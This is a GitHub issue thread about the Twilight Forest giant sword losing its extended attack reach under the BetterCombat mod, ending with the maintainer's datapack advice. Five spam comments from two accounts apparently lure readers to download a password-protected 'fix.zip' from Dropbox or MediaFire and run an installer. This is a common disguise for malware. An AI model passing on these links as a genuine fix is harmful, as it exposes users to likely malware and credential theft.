### ISSUE TITLE
Twilight Forest Giant Sword does not work as intented

### ISSUE THREAD

**Issue by LioxAcc** [ZsoltMolnarrr/BetterCombat#404]
**Minecraft version** - 1.20.1
**Mod loader** - Forge 1.20.1-47.3.7
**Mod version** - BetterCombat Forge 1.8.6 - twilightforest-1.20.1-4.3.2508
**I am using the latest version available** - yes

**Describe the bug**
The Twilight Forest giant sword is supposed to have an additional range than a normal sword (2.5+)
However with Better Combat, it acts like a normal sword

**To Reproduce**
1- Try to attack any entity from a distance greater than 2.5 with a giant sword
2- See that you can't

**Expected behavior**
The sword should do damage up to 5 blocks away

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZsoltMolnarrr** [comment]
The creators should then weapon attributes files to match this expectation.

This can also be done using a datapack. All info is in the project readme.
